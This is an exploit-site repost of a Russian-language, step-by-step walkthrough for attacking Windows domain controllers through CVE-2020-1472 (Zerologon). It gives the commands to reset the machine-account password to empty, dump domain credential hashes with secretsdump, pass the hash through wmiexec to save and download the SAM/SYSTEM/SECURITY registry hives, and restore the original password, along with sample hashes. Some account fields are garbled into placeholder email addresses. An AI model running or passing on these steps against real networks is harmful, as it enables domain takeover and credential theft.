Sploitus

Exploit for cve-2020-1472 CVE-2020-1472

kitploit · 2026-08-25

Exploit Code

MARKDOWN62 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SHANFENGLAN-CVE-2020-1472
# cve-2020-1472

@toc

# Принцип уязвимости

Принцип довольно сложный, если интересно, можно посмотреть статью по ссылке ниже: https://www.freebuf.com/articles/system/249860.html

# Эксплуатация

## 1\. Изменение файла impacket.dcerpc.v5.nrpc

Необходимо использовать файл https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py для замены локального файла nrpc. Путь к локальному файлу nrpc: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py

## 2\. Обнуление пароля учетной записи машины yukong$

`python cve-2020-1472-exploit.py 机器账户名 ip` ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/3e2450536dd74f7b7511d9c2b548344fc30ba5ffc7a0d4bd5eb06649ce237445.png) И обнаружили, что пароль учетной записи машины обнулен, 31dc... представляет пустой пароль. ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/77b8c74e5e2dec8f9f2cd5adf7755393e82bc169e2027854f26e54ffb7b4048a.png)

> Способы получения учетной записи целевой машины или NetBIOS-имени:
> 
>   1. net view ![](https://assets.kitploit.com/production/public/readmes/32288/02c931110186451e7eba87b6b85519c87616c4d6b431e39559d7c14d0ec540e0.png) Имя сервера с добавлением $ является именем машины, например, lisi$ или yukong$.
> 


>   2. nbtstat -A ip ![](https://assets.kitploit.com/production/public/readmes/32288/e5f0624dac8a3d0f1c55e78144ead4b076e6905c6daf7e1b004e5a57807c6ebb.png) Существует много способов определить IP контроллера домена, например:
>   3. Проверить хосты с открытым портом 53
>   4. net time — вывод вернет имя хоста контроллера домена, затем пинговать
>   5. systeminfo — посмотреть значение в разделе домена, пропинговать — получим IP контроллера домена
>   6. Посмотреть DNS своего хоста
> 


## 3\. Чтение пароля администратора

`python secretsdump.py test.com/some-email@example.com -no-pass` ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/34f6c57e80d131f5d82d5945e9811be346ccc096ae3385869cfd59d3eb7266f8.png) Обнаружили, что теперь можно использовать учетную запись машины с пустым паролем для чтения хешей пользователей на контроллере домена.

## 4\. Загрузка файла sam цели для подготовки к восстановлению пароля машины

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/some-email@example.com reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save

get system.save get sam.save get security.save

del /f system.save del /f sam.save del /f security.save

exit

![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/810958e449166e322c50fa89a3408dcb1a180d06064d7db9c6d7794ce2e9e457.png) После выполнения в папке со скриптом wmiexec можно найти загруженные файлы: ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/5dc818624b34500f6cb239fd03e52d04d5cc14dbb7ae97c8c680296b3547401b.png)

> python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/some-email@example.com -use-vss Это команда не выполнилась

## 5\. Взлом файла sam для просмотра предыдущего пароля машины

`python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL` ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/6c507938db53ec1a7177472823ef94e09bf6826ae9e392a3633128eb448d2adf.png) Сохраните пароль, обведенный красным — это предыдущий пароль машины, а именно aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.

## 6\. Восстановление пароля машины yukong$

python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/51d3417c048f657633942c1bdcd1c637704daf6c37977f8c9a6e97a1eb7c9d51.png)

## 7\. Проверка успешности восстановления пароля

python secretsdump.py test.com/administrator:some-email@example.com -just-dc-user yukong$ python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/some-email@example.com -just-dc-user yukong$ ![Вставьте описание изображения здесь](https://assets.kitploit.com/production/public/readmes/32288/fc9919147dec7526e5d9426ad10632374f4493eb9bb023ca327fc5de494e9603.png) Обнаружено, что восстановление прошло успешно.